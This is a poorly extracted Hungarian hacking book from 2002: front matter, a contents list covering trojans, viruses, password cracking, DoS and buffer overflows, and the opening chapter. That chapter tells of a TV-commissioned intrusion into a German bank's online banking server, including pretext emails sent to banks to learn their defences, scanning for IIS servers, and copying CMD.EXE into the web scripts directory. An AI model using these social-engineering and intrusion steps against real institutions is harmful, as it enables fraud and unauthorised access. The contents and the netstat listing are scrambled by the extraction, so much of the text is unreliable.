Thomas Vosseberg

Feltörés kontra védelem
Fontos figyelmeztetés!
A szerző a könyv teljes tényanyagát a legnagyobb gonddal dolgozta ki, illetve állította össze, és hatékony ellenőrzések mellett készítette. A hibák ennek ellenére sem zárhatók ki, ezért a kiadó és a szerző kénytelenek felhívni a figyelmet arra, hogy hibás közlésekre visszavezethető következményekért sem garanciát, sem jogi vagy bármilyen értelemben vett felelősséget vagy jótállást nem vállalnak. Az internetcímek vagy a verziószámok a szerkesztés lezártakor rendelkezésre álló állapotot tükrözik. A kiadó és a szerző semmilyen felelősséget vagy garanciát nem vállal a változásokért, amelyek tőlük függetlenül fellépő körülményekből adódnak. Az esetleg letöltésre kínált fájok és információk kizárólag nem üzleti felhasználásra szolgálnak. Üzleti felhasználás csak a licenctulajdonos beleegyezésével lehetséges. © 2002 Franzis1 Verlag GmbH, 85586 Poing © 2002 Computer Panoráma, 1091 Budapest, üllői út 25. Felelős kiadó: Dely Tamás ügyvezető igazgató Felelős szerkesztő: Horváth Annamária Fordította: Murányi Eszter Tervezőszerkesztő: Dancs Katalin Címlapterv: Szincsák László Minden jog fenntartva. Jelen könyvet, illetve annak részeit tilos reprodukálni, adatrendszerben tárolni, bármely formában vagy eszközzel - elektronikus, fényképészeti úton vagy más módon - a kiadó engedélye nélkül közölni. A kötetet készítette: Levilágítás: HVG Press Nyomtatás és kötés: Szegedi Kossuth Nyomda Kft. 6723 Szeged, Makkosházi krt. 1. Felelős vezető: Gera Imre ügyvezető igazgató
ISBN: 963 7639 225

Tartalom
1. A BANK-HACKELÉS 1.1 A feladat 1.1.1 Feltételek 1.1.2 A megoldáshoz vezető út 1.2 Hozzáférési út - információszerzés a Social Engineering módszerrel 1.3 A megfelelő cél keresése 1.3.1 Takarékpénztárak - túl sok szerverellenőrzés 1.3.2 Kutatás: IIS szerver kerestetik 1.3.3 Az operációs rendszer és a tranzakciós szoftver 1.3.4 Hogyan védik a szervert? 1.3.5 Nincsenek logfájlok - ezt biztosan az OFX irányítja 1.3.6 Adatátadás scriptekkel 1.3.7 Az adatletöltés 1.4 Utóirat a bank-hackeléshez 1.5 Összefoglalás 1.6 Sajtóbeszámolók 1.7 Tapasztalatok más bankoknál 1.7.1 Forgatókönyv a takarékpénztár-területen 2. A WINDOWS-RENDSZEREK (9X, NT, 2000) GYENGE PONTJAI 2.1 A hackeren túl - merevlemez-fejreállás, adatbetekintés vagy lopás 2.1.1 Különbségek a Windows 9x, az NT és utódai között 2.1.2 A fizikai támadás 2.1.3 Képernyővédő - jelszó - a bennfenteseknek nem okoz problémát 15 16 16 17 18 20 20 21 22 23 26 26 28 29 29 30 33 33 37 38 39 39 42

2.1.4 Automatikus lejátszás - a betörés előkészítése CD-vel
2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak

44
47 47

2.2.2 A jelszófájlok
2.2.3 Jelszavak a Windows 2000 alatt 2.3 A távoli elérésű támadás - internet- vagy hálózati felhasználók, vigyázat! 2.3.1 A fájl- és nyomtatómegosztás - veszélyes biztonsági rések 2.3.2 Mik azok a szkennerek, és hogyan működnek? 2.3.3 Milyen lehetőségeik vannak a betolakodóknak?

49
51 52 53 54 56

2.3.4 2.3.5

Jelszóval védett megosztások BruteForce-rohamok a megosztási jelszavak ellen

57 57
58 59

2.3.6 Óvintézkedések 2.4 További támadási technikák 3. ALAPOK

3.1 Az anonim Internetezés csökkenti a kockázatot 3.1.1 A legtöbb felhasználó sokat elárul 3.1.2 Névtelenül
3.2. A TCP/IP 3.2.1 Mi a TCP/IP?
3.2.2 Különböző protokollok a rétegekben 3.3 Néhány alkalmazás és protokoll használata és a biztonságosságuk 3.3.1 A Telnet

61 62 63 65
68 68
70 80 81

3.3.2 Az FTP 3.3.3. Az IRC
3.3.4 3.4 4. 4.1 4.2 4.2.1 Az IP-címzés Aportokról A TRÓJAIAK A történelmi minta Miből áll egy trójai? A szerver kiosztása

82 84
85 87 91 92 92 93

4.2.2 4.2.3 4.3 4.3.1 4.3.2 4.3.3 4.3.4 4.3.5 4.3.6 4.3.7 4.4 4.4.1 4.5 4.5.1 4.6 4.6.1 4.6.2 4.6.3 4.6.4

A kliens otthon marad, és vezérli a szervert Hogyan szerzik meg a hackerek az IP-t? így álcázzák és terjesztik a trójaiakat A trójaiakat fájlokba integrálják Álcázás a WinZip-pel. A trójaiakat az ICQ-val is tovább lehet adni Elég egy CD és az automatikus lejátszás funkció A lemezek majdnem ugyanígy működnek További terjesztési stratégiák Mit csinálnak a hobby-hackerek a trójaiakkal? Sub7 - egy trójai rémisztő lehetőségekkel Támad a Sub7 BackOrifice 2K - Hálózati eszköz vagy támadás a Microsoft ellen A BO2K és összetevői így ismerjük fel a trójait a rendszerünkben Vírus- és trójai-szkenner AutoRun bejegyzések Windows-Registry - ez már izgalmas Módszerek az Explorer.exe-vel a C:\ meghajtóra

94 95 96 96 97 98 99 100 100 101 102 103 105 106 107 107 108 109 112

4.6.5
5.

A runonce.exe kicserélése
VÍRUSOK - VESZÉLYES FÁJLOK

112
113
115 116 117 117 117 118 118 119 119 119 121 121 122 122 122 124 124 124 125 125

5.1 Alapok 5.1.1 Defektes cluster mint álcázás 5.1.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.1.3 Videokártyák - az elvetemült támadók búvóhelyei? 5.2 A vírus felépítése 5.3 Hogyan fertőz meg a vírus egy fájlt? 5.3.1 így fertőznek a bootszektor vírusok 5.3.2 A dropper vírust helyez el 5.4 A legfontosabb vírustípusok rövid áttekintése 5.4.1 Bootszektor vírusok 5.4.2 Companion vírusok 5.4.3 Killerprogramok 5.4.4 Logikai bombák 5.4.5 Makrovírusok 5.4.6 Hálózati vírusok 5.4.7 Polimorf vírusok 5.4.8 Stealth vagy rejtőzködő vírusok 5.4.9 A TSR fájlvírusok 5.4.10 Update vírusok 5.4.11 Férgek - az ILOVEYOU és társai

5.4.12 Időzítők
5.5 Word makrovírus írása 5.5.1 Minden ténykedés központja - a Normal.dot fájl 5.5.2 Modul vagy osztálymodul? 5.5.3 Vírusok kontra ServiceRelease 5.5.4 Modul makrók 5.5.5 Ilyet is lehet: a vírus egy Payload-ot hív meg 5.5.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.5.7 A vírus jelszóval védi a fájlt 5.6 Megfertőzött osztálymodulok

126
126 126 127 127 127 131 132 133 133

5.7

ILOVEYOU

137
138 138 140 140 149 149 150

5.7.1 Mi az a féreg? 5.7.2 A működési mód 5.7.3 Hogyan tudott a féreg elterjedni? 5.7.4 A forrás - kommentárokkal 5.8 Hogyan működnek a vírusvizsgálók? 5.8.1 Szkennermodul 5.8.2 Víruspajzs

3 Large Packet-támadások avagy a Ping of Death 10.2.Distributed Denial of Service támadások 10.4.1 Az IP-spoofing mint előfeltétel 10.3 TCP-FIN-Scan 6.2.2.8 DDoS .1. A DENIAL OF SERVICE TÁMADÁS 10.2.1.2 Adatok 11.6 6.3.5 6.1 Szöveg 11.2 7.4. SNIFFER 9.3.praktikus és veszélyes 8.3 7.1.4.9 Fragmentált szkennelés UDP-lCMP-Port-Unreachable szkennelés UDP-Recvfrom-And-Write szkennelés ICMP-echo-scanning/ping-szkennelés A nyitott portok csak a kezdetet jelentik A portszkennelés elleni védelem 154 154 154 155 155 155 152 7.2 Out-of-Band csomagok .3 Astack (magyarul: halom/rakás) 11.4.8. BUFFER-OVERFLOW 11.5.1.4 Land támadások 10.8 6.6 A jelszófájl 8.1 E-mail-támadások 8. SZKENNELÉS .7 Smurf 10.4 „Fertőtlenítő" A vírusvédő program kiválasztásának a szempontjai 150 150 6.1. A szkenner 6.2.2 7.1 Az operációs rendszer memóriakezelése 11.1.4 Mit lehet tenni a snifferek ellen? 10.4.1 7.3 5.2.2 Félig nyitott TCP-szkennelés 6.2.jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők Ismert felhasználói nevek jelszavainak a kitalálása A beállítások egy áttekintésben Jelszavak megfejtése a John the Ripperrel Single Mode A szólista módszer Incremental mód Extemal mód A John legfontosabb parancsai 157 158 160 161 162 162 163 163 164 164 165 165 7.1 7.4 7.1 Mi az a sniffer? 9.3 7.2 7.1 Mailbombák .2 Milyen biztonsági rések vannak? 9.2.7 6.2.1.túlcsordul a postafiók 8.8.4 6. 7.2.2 Hogyan működik egy sniffer? 9.9 Védelem a DoS-támadások ellen 11. TÁMADÁSOK AZ INTERNET-FELHASZNÁLÓK ELLEN 8.a „nuken" 10.1 Hogyan lehet ezt kihasználni? 165 167 168 168 170 172 174 175 176 181 182 182 184 184 187 188 189 190 190 191 192 192 192 193 195 196 197 197 197 197 198 .5 TCP-Syn-Flooding 10.2 ICQ .4.2 A Buffer-Overflow-támadások 11.1 Szkennelés teljes TCP-kapcsolattal 6.6 Ping-Flodding 10.3 A ConCon bug 8.biztonsági kockázat? 8.2.2 A fájlmelléklet kitömése 8.5 JELSZÓFELTÖRÉS Hackelt security-site .1 Az ICQ .1 7.3 A sniffer veszélyei 9.2 Szkennelési eljárások 6.2.A RÉSEK KERESÉSE 151 152 153 153 153 6.4 7.

2.2 Látogatásszámláló résekkel . TŰZFALAK 13.2.3 Áldozat a Buffer-Overflow-kért 11.5 Milyen védelmi mechanizmusok vannak? 11.1.1 Összefüggés a CPU és a Buffer-Overflow között 11.2 Védelem 12.1 Egy desktop tűzfal megtámadása 13.1.5 Defacement .2.1 A tűzfal feladatai 13.count.3 Tűzfal-koncepciók 13.4.cgi 12. BIZTONSÁG A WEBEN 213 214 217 221 221 222 224 12.2 Desktop tűzfalak 13.1 Védelem 12.11.5.1 A tűzfal biztonsági szempontból fontos összetevői 13.3 Minek kell a Shellcode változónál állnia? 11.3 BBS biztonság 12.1.4.2 Hogyan működik? 11.2.4 Jelszóval védett webterületek megtámadása 12.1 A CGI további ismert gyenge pontjai 12.1.2 A Buffer-Overflow-k és a tűzfalak 199 202 208 209 211 212 212 12.6 Hogyan védhetjük meg a webszervert? 225 226 227 229 13.a „script kidek" nemzeti sportja 12.2 A tűzfalak kategóriái 13.4 Hogyan ismeri fel a támadó a tűzfalat? 13.1.5.2 Védelem a desktop tűzfallal 231 232 233 234 235 236 237 239 240 .4 Honnan lehet felismerni a Buffer-Overflow-t? 11.1 CGI-scriptek biztonságossága 12.1.2 Hitelkártya fake-ek 12.

így a támadás ennek a könyvnek a megjelenésekor már nem ismételhető meg....................1 A feladat 2001 júniusában érdekes feladatot kapott egy fiatal hacker-csoport: banki rendszereket és elektronikus kártyákat kellett tesztelniük........................ hogy az végrehajthatatlanná váljon..jogi megfontolásokból . 26 1........3...... A támadás visszhangja a könyv szerzőjére nézve mindenképpen pozitív volt..1.1.....3 Az operációs rendszer és a tranzakciós szoftver 22 1.. Két lehetséges indítás jutott a csoport eszébe: • Az intézmény webszerverének a megtámadása.......1 Takarékpénztárak-túl sok szerverellenőrzés.....21 1.........3...6 Adatátadás scriptekkel...2 Kutatás: IIS szerver kerestetik .................2 A megoldáshoz vezető út.....4 Hogyan védik a szervert?.....3..............7 Az adatletöltés......1. Meg kellett találni a hozzáférési utat az adatokhoz vagy a szerverhez........... A biztonság kérdését kétféleképpen lehetett megközelíteni: « Mennyire védettek az ügyfelek adatai......20 1. 1....33 1 A bank-hackelés Rövid ideig az érdeklődés középpontjába került egy különös támadás egy németországi bankszerver ellen... hogy megakadályozza a hiányosság nyilvánosságra kerülését..... amelyeket a homebanking során végrehajtanak? Van-e lehetőség..információszerzés a Social Engineering módszerrel___18 A megfelelő cél keresése........ átirányítani stb.... 26 1.ezt biztosan az OFX irányítja ......... 3.....7..... Az érintett intézmény a „betörés" hatására ugyan változtatott online banking rendszerén.1....5 Nincsenek logfájlok ....... 1.. csak a bank jött ki rosszul az ügyből........letakarták. manipulálni...... .20 1..Tartalom A feladat........ 28 Utóirat a bank-hackeléshez 29 Összefoglalás....... Be kellett törni a rendszerbe...23 1............3......16 1..2 A megoldáshoz vezető út A dolog a következőképpen zajlott: 1.... amelyről ebben a fejezetben írunk.............. • Mindennek észrevétlenül kellett történnie...........1 Forgatókönyv a takarékpénztár-területen....1................. • A bank online rendszerét nem lehetett sem zavarni.......1 Feltételek......... Ez azt jelentette..... sem korlátozni a működésében. fejezet ... nehogy az érintett bank az adás sugárzása előtt ideiglenes intézkedéseket tegyen..... 2...........? 1..... 4........ s az ARD Technikai Tanácsadó műsor keretében kellett ellenőrizni.....16 1........1 Feltételek A feladat természetesen bizonyos feltételekhez volt kötve... ...... mennyire biztonságos manapság az online banki ügyintézés Németországban.................30 Tapasztalatok más bankoknál..........33 1...... és ezt követően a banki szerver megtámadása a ...29 Sajtóbeszámolók..... vannak-e lehetőségek betörni egy banki szerverbe? • Mennyire biztonságosak a tranzakciók. adatokat lekérdezni... ám mivel a potenciálisan fenyegető károk még most is jelentősek lehetnek............... Ezek közé tartoztak: « Egyeden ügyfelet sem érhet kár.......... és fel kellett deríteni a manipulációs lehetőségeket. • Trójai elhelyezése a homebanking-ügyfeleknél.....3.... a bank nevét a szerzők ......... Manipulálni kellett a tranzakciókat...17 Hozzáférési út ... hogy egyetlen tranzakciót sem lehetett úgy manipulálni vagy hamisítani...3. Ki kellett kémlelni az adatokat....3....

amely csak a 443-as portot (HTTPS-kódolású adatátvitel SSL-lel) bocsátja rendelkezésre. Továbbá az . hogy aligha lehetne végrehajtani a tulajdonképpeni tesztet. S ha egy ilyen akció kitudódna. hogy egyszer azért megpróbálkoznak vele. és az internetről jövő kapcsolattól fizikailag elválasztott kapcsolatot állít elő a webszerverhez úgy. Több banknak e-mailt írtak. hogy a felépítése miatt ne tudjanak egy szabvány ügyfélszolgálati szöveggel válaszolni rá. 1. jelzi és vissza is veri a rendszer elleni támadásokat. amelyek online portált működtetnek. Először tehát információkat kellett gyűjteniük. a következő feladatokat látja el: Az internetkapcsolat és a webszerverhez kapcsolódás fizikai szétválasztása: egy külső rendszertől induló kapcsolat felépítésénél átveszi a kapcsolatot. Az infrastruktúra Az XY bank online banki rendszerének infrastruktúrája a következők szerint van kiépítve: Valamennyi online banking megkeresés egy Cisco routeren keresztül érkezik. Más megoldást kellett tehát találni. mint nálunk. amely naplózza. Ügyfeleket kell találni. Így az ügyfelek banki adatainak az átvitele az online banking oldal betöltésétől kezdve biztonságos és kódolt. installálni kell a trójait stb. Éppen ezért hálózattech-nikailag jártasnak mutatták magunkat. a pénze sehol sincs nagyobb biztonságban.2 Hozzáférési út . amely a Cisco router és a bank szervere között található. Intrusion Detection System is található. 1. A Cisco router mögött még egy exkluzíván az XY bank számára installált. Végülis arra a döntésre jutottak. majd a megfelelő pillanatban. és végezetül szenvtelenül megkérdezték. aki hallott egy másik bank webszerverét ért hackertámadásról. enged át kéréseket. Ezt a mailt elküldték 10 nagy német pénzintézetnek. annak olyan sajtóviszhangja lenne. lecsapni. és azt sem tudták. nem utolsósorban a (német) Btk. amelyben ügyfélnek adták ki magunkat. hogy semmilyen visszacsatolás nem lehetséges kívülről a külső rendszerre. A plug-gateway tűzfala minden csomagot analizál. Az egyszerűbb természetesen a régi jó trójaihoz való visszanyúlás lett volna: néhány PC-t kikémlelni. hiszen talán csak kisebb hiányosságokra bukkannak.kikémlelt ügyféladatokkal. 202. vagy pedig gyanút fog. hiszen a kikémlelés után várni kell az első homebanking tranzakcióra. amelyeket nyugodtan fel lehet mutatni. A megfelelő lehetőséget tehát csak egy pénzintézet webszerverének a feltörése jelenthette. Természetesen egyik résztvevőnek sem volt pontos koncepciója. A plug-gateway. integrált tűzfallal. hogy valójában mennyire van biztonságban ennek az intézménynek a pénze.információszerzés a Social Engineering módszerrel Mindenekelőtt személyes kapcsolatokon keresztül próbáltak információkat szerezni a bankszerverről. Néhány terepkísérlet után azonban ez a lehetőség a hajánál előrángatottnak tűnt. és csak az exkluzíván az online banki rendszer elé kapcsolt pluggateway-en. az alábbi mail érkezett. és most tudni akarja a saját bankjáról. hogyan is védi a bank az online ügymenetet és az ügyfelek adatait. amikor az ügyfél online intézi banki ügyeit. Az ÖN XY bankja. és csak a szűrőszabályok (csak HTTPS elérések engedélyezettek) teljesülése esetén továbbítja az online banki rendszer webszerverére." típusú szabványmail után. Ez természetesen heves vitákat váltott ki. Körülbelül 5 nap és 9 „Aggodalomra semmi ok. §-aira való tekintettel. a szerzőket is meglepve. és 263. illetve védett-e az online banki szolgáltatása. át kell játszani nekik egy trójai vírust. A mailt úgy kellett megírni. Azonban a saját ügyféltanácsadót kérdezgetni bankja szerverének részleteiről nem túl szerencsés. hiszen többnyire maga sem tud róla semmit. Először tájékozódni kellett a banki struktúráról. Ráadásul egy ilyen indítást állandóan felügyelni is kell. hogyan is néznek ki pontosan a banki rendszerek.

mert például Hannoverben majdnem minden takarékpénztárat ÉszakNémetországból hostolnak. hogy az adminek „a gépen ülnek". Ezek gondoskodnak a számlaszámok és a PIN-ek belépő ellenőrzéséről. hogy minden egyes bankot megvizsgáltak. hogy további információkat tudjunk meg a rendszerről (hardver.hotnebanking-mecklenburgvorp. 1. miközben ez a szerver a DVG-nél. világossá vált a számukra. hogy nincsenek-e esetleg kódolva ezek stb. amelynek a szervere közvetlenül csatlakozik az online banking-hez. és semmilyen visszacsatolást nem engednek meg a valójában felhasznált PIN-re. Az volt ugyanis a probléma velük. Ez egy jól sikerült példa volt a Social Engineeringre.3. nem sikerült.1.cgi/Ostseespk_Rostock. és már egy tesztcélú szkennelés is figyelmet keltene. Biztonság Az infrastruktúra (hardver és rendszerszoftver szinten) megfelelő védettsége érdekében még a következő biztonsági intézkedéseket tettük az online banki ügyintézésnél: A kliens és a szerver közötti kapcsolat 128 bites maximális kódolással épül fel. 1. Ez a szabvány az internetes tranzakcióknál biztonságos. Itt van példának a www. és ott úgy változtatják meg a login-oldalakat. hogy lássák a szervereiket. például az OFX-et (Open Financial Exchange). A részletes információk szkennelése . Mint várható. Részletek a szerverekről . a következő cím alatt fut: https://ww2. hogy minden bevitel egy log-fájlba vándoroljon. Takarékpénztárak . hogy csak egy bank login oldaláról juthatnak hozzá az ügyfelek adataihoz.finommunkák Ami a mail-bői nem derült ki. hogy ugyan majdnem minden takarékszövetkezetnek van saját weboldala. ám az onlinebanking egy számítógépközponton keresztül zajlik. azzal kezdhettek. 06.ostspa. Hannoverben található.). port) a 128 bites kódolású. szerver stb. továbbra is tisztázatlan. 3. és ki lehetett indulni abból. biztonságos internet-eléréssel érhető el.06.de. arra a módszerre amelynek révén részletes bepillantást nyerhettek a banki webszerver biztonsági intézkedéseibe. azonban néhány szkennelés (közelebbit ld. hóban maga hajtott végre szkennelést a nyitott internetfellépés és a bank online rendszere ellen. Mivel a keresett formátumból tulajdonképpen nem sok volt. Egy támadás itt egy kicsit melegnek tűnt. hogy keresnek egy nagyobb bankot. A hackeléshez tulajdonképpen csak egy Microsoft HS-szerver jöhetett szóba. később) eredményeként már világos volt: minden bank különböző pénzügyi szoftvereket használ. így az adatbázist egyáltalán nem lehet közvetlenül elérni az internetről. az online banki rendszer csak HTTPS-en keresztül (443. Szkenneltek néhány bankot.2 Kutatás: US-szerver kerestetik így tehát inkább a nagyobb bankokra kellett összpontosítani. melyik bank legyen az? 1. 2. A kérdés csak az volt. de a tulajdonképpeni oldal. operációs rendszer.de/cgi/anfang. A kísérlet. havi biztonsági analízise A rendszeradminisztrátor 2001. ahol az ügyfelek a számlájukhoz férnek. Ennek az oldalnak a szervere Schwerinben van. Az adminisztrátor 2001. Miután ezekről a szerver-kliens szoftverekről csak szűkös információkat találtak. A PIN-ek kódolva vannak tárolva az adatbázisban.adatbázis szerver fizikailag el van választva a webszervertől és az alkalmazástól.túl sok szerverellenőrzés A német takarékpénztárak az infrastruktúrára vetett rövid pillantás után kiestek.3 A megfelelő cél keresése Az ötlet tehát az volt. Még ha lehetséges is lenne adatokhoz jutni az OFX-adatbázisból. és kezelik a további ügyfélinformációkat.3.

Feltérképezni az operációs rendszert és a tranzakciókhoz használt szoftvert. és kapcsolatokat sem engedett meg . 4. fejezetben részletesen is olvashatnak. 2. mint magáé a rendszeré. amely e bank mellett szólt. 6. és a még futó régi rendszert „elhanyagolják". mert e bank ügyfeleinek egész Németországban erről a portálról kellett bejelentkezniük.Itt láthatók az infók a felhasznált szerverekről A szkennelő program segítségével különböző bankportálokat vizsgáltak. A bank minden szakembere az új projekten dolgozik. úgy az oldalé.3. egy portált. a ••• ügyfelei be tudtak login-olni. így a webszerver megtámadásának az időpontja több mint ideális. hogy vannak-e logfájlok információkkal. Ellenőrizni a védelmi mechanizmusokat. így az oldal elérési számainak is magasnak kellett lenniük. 1. (A szkennelés témájáról a 6.) Napokig tartó szkennelés után találták meg a ••• oldalt. Tehát abból indulhattak ki. mint egy leányvállalat.az előkészítés feltételei A cél optimálisnak tűnt. 3. a szerver tervezett átépítése volt.0-val. a szervert tűzfal védi. hogy megtalálják a betörésre alkalmas rendszert. 5. A program szállította a legfontosabb információkat az egyes bankok és takarékpénztárak webszer-vereiről. Kikutatni az adatátvitelt. amelyen keresztül úgy a bank.3. Egy további érv. Tivoli Management Software-rel karbantartva (amelynek a hibáiról lehetett már hallani)! De ezt ezen a szerveren nem ellenőrizték.4 Hogyan védik a szervert? Úgy tűnt. Utólagos becslések szerint az említett szám 5000 és 9000 között mozgott óránként. Ellenőrizni. A támadáshoz a következő lépéseket kellett végrehajtani: 1.3 Az operációs rendszer és a tranzakciós szoftver Egy NT-webszerver IIS 4. hogy sikerrel járnak. tökéletesen elegendő volt. lehetséges. mert egy végzetes rés a IIS-en. 1. mert nem válaszolt a pingekre. Hitelesíteni. A cél ismertetőjegyei . amely a parancsok dekódolását érintette. Tesztelni az exploitokát.

130.0.xx:443 Távoli címek 0.0.144:1073 217.xx:443 193.213:1240 Állapot TIME_WAIT .0.0.0.0.0:0 0.0.153.209.0.0.213:1236 62.209.0.0.5:1435 172.0. Helyi címek TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.xx:3127 193.0.0.152.1:1031 0.0. 152.153.153.4:1557 212.0:0 172.4.0.24.xx:80 193. de ezt kizárni sem lehetett.0.0. A szkennelések során nem derült ki pontosan.0.24.211:4232 62.197.0.0.0:0 0.0:0 62.0:0 0.0.0.27.0.0.1:1025 0.24.0.xx:3126 172.209.0.0.0.0:0 62.0.0:0 0.197.0.0:0 0.0:3697 0. és azt sem lehetett megmondani.130.158.0.0.0.130.158.0:0 0.0:0 0.0:0 0.0.0.0:0 Állapot LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING ESTABLISHED LISTENING LISTENING ESTABLISHED LISTENING LISTENING LISTENING LISTENING ESTABLISHED TIME_WAIT ESTABLISHED TIME_WAIT TIME_WAIT LISTENING TIME_WAIT TIME_WAIT ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED LISTENING LISTENING LISTENING LISTENING CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TC P TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.209.0.0.4:80 172.209.130.209.158.0.24.213:1233 62.0.0.0.0.0:3037 0. hogy a webszolgáltatón (80.0.1:1028 127. 133.0.166.27.0:1027 0. intranet kapcsolatból indulhattak ki.xx: 1029 172.130.0.46.158.0.153.0:5044 127.158.24.0:0 0.0:1031 0.xx:443 193.27.0.xx:80 193.0.0:3038 0.0.xx:31 11 172.0:3128 0.209.158.0:0 0.0:135 0.209.158.27.1 52. 152.0.0.133:4233 0.0.0.0.24.0.209.0.0.0:135 0.0:2867 0.0:0 0.0. 152.101.0. 152.0.0:0 0.0.0.209.209.158.xx:80 193. mert a netstat-jelentés 4:00 óra körül kapcsolatokat mutatott a 4966/4967 portra.0.xx:80 193.0.1:1025 127.0.0.153. xx:443 193.0.kifelé.3:1036 62.0.xx:138 193.152.0.0.0:2882 0.0.0.0.0.0.1:1031 1 72.xx: 137 172.0:0 0.157.0.46.0.209.0.0. TCP Helyi címek 193.0.158.27.0.166.0.xx:443 193.0:3125 0.0:2874 0. 158. milyen tűzfalról volt szó.0.0. 209.209.0:0 0.24.xx:80 193.0.130.213:1235 62.0.0. Íme a netstat-jelentés: Prot. port) és a HTTPS-en (443.0.0.0.0:0 0.0.158.0. 209.0.0:0 0.0:0 127.xx:80 193. xx:3125 172.24.0:0 0.130.209.xx:443 Távoli címek 62.0:0 0.206.0:0 0.xx:443 193.xx:80 193.0:0 0.xx:139 193.0:0 0.236:57480 193.1 58.0:0 0.213:1234 62.0:0 0.0:3111 0.24.209.27.0.2.0.158.0.61:1119 212.0:3489 0.0.xx:80 193.197.0.0.145.xx6.0.xx:80 193.24.xx:137 193.24.158.209.158.209. xx:3038 1 72.0.1 58.xx:80 193.209.209.24.0.27.213:1237 62.0.0.0.0.1:1026 127.27.211:4233 62.24.1:1025 127.0.0.xx:443 193.0:512 0.xx: 139 1 72. port) kívül más portok elérése is megengedett-e.5:1435 0.0:161 0.4:80 172.0.158.0.0:0 0.158.0.0:0 127.0:0 0.0.158.0.0.158.0.158.0.0:0 0.0:0 0. 152.158.0:1037 0.209.0.0:4487 0.0:4796 0.xx:138 1 72.0:3168 0.0.0.24. 152.158. Mivel a távoli számítógépet egy komputernévvel jelölték.213:1182 62.213:1238 Prot.0.191:1042 212.130.xx6.xx:443 193.5:1435 172.27.0.

209.xx6.xx:443 193.153.54.158.xx: 1202 0.158.xx:443 193.158.27.3.158. Előkészületek (hozzáférés megszerzése) A megfelelő URL megadásával elérték a hozzáférést.158.158.27. a PIN és a felhasználó által megadott TAN az OFX-hez továbbítódik.xx:443 *:* *:* *:* *:* *:* *:* *:* TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT ESTABLISHED CLOSING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT CLOSING TIME_WAIT ESTABLISHED CLOSING LISTENING ESTABLISHED *:* 1.xx:1030 62.xx:138 193. a felhasználói adatokat egy adatbázisba küldik.209.xx6.209. hogy működőképesen legyen kezelhető a .209.209.3:1038 62. 209. xx:443 193.27.11.xx:443 193.27.xx:3121 193.xx6.xx6.27.209.209.xx:443 193.209.xx:443 193.153.158. A parancsfordító CMD. és ott hasonlítják össze.3:1037 62.158.xx:1182 62.158. és az adatokat nem lokálisan ellenőrzik.209.152.130.xx:443 193. amelyek azonban nem adtak információt a kapcsolatokról. hanem JAVA scripteket használnak .209.153.0.xx6.158.xx:443 193.27.xx:443 193.158.24.xx:1186 62.209.xx:443 193.xx6. sem a C:\WINNT\ system32\LogFiles könyvtárban.27.158.27.xx:443 193.3. 152.xx:443 193.27.1 58.27.0:135 0.27. Találtak viszont OFX-szoftver-jelentéseket.209.1 58. 1. illetve kezeli az OFX szoftver.158.1 58.24.158.xx:443 193.xx:443 193.130.5 Nincsenek logfájlok ezt biztosan az OFX irányítja IIS logfájlokat egyáltalán nem találtak.1 58. xx:1277 193.56. milyen módon lehetne megtámadni a szervert.27.0:0 193.209.158. sem adatbázis-jelszavakat vagy hasonlókat nem találtak.xx:3128 0.153.213:1241 62.amelyek szokatlan módon nem VB scripteket.xx6.59.158.209.24.0.xx:1185 62.19. Természetesen pontosan megnézték.vezérlik. és ezt éri el. 209. Ebből továbbra is arra következtettek.213:1247 62. hogy ezeket központilag tárolják egy számítógépen.xx:1184 62.xx6.158.56.24.xx:443 193.xx:3128 209.xx: 1030 193.0.209.3:1039 62.1 58.209.209.158.213:1243 62.3:1042 62.xx:137 193.6 Adatátadás scriptekkel A szkennelés után világos lett.213:1246 62.213:1245 62. vagy teljesen lemondanak a loggolásról! Az OFX-ről A szerveren sem folyószámla-adatokat.xx:443 193. 209.0.3:1044 62.158.1 58. Az OFX-et az ASP-oldalakról .130.xx: 1029 193.19. sem máshol.158.xx:443 193. 152.152.xx:443 193. hogyan is fogadja és továbbítja a rendszer az adatokat bejelentkezéskor.209.27.xx:443 193.TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP UDP UDP DP UDP UDP UDP UDP UDP 193. 209.xx: 11 94 62.209.209.xx6.xx:443 193.0. hogy vagy a tűzfal log-okat értékelik ki. xx:443 193.130.19.130.209.209.209.3:1040 62.152.27.209.24. Feltételezték.209.27.213:1244 62.158. Tehát a tranzakcióknál a tranzakciók számai.3:1043 62.0:161 172.158.158.158.213:1242 62.19. 154.0.xx:138 1 72.158.130.xx:443 193.xx:443 193.3:1041 62.xx:2326 63.209.xx:137 172.EXE-t a webszerver rendszerkönyvtárából a script-könyvtárba másolták. amely aztán visszaadja a hibakódokat.xx:443 193.165.xx:443 1 93.209.130.

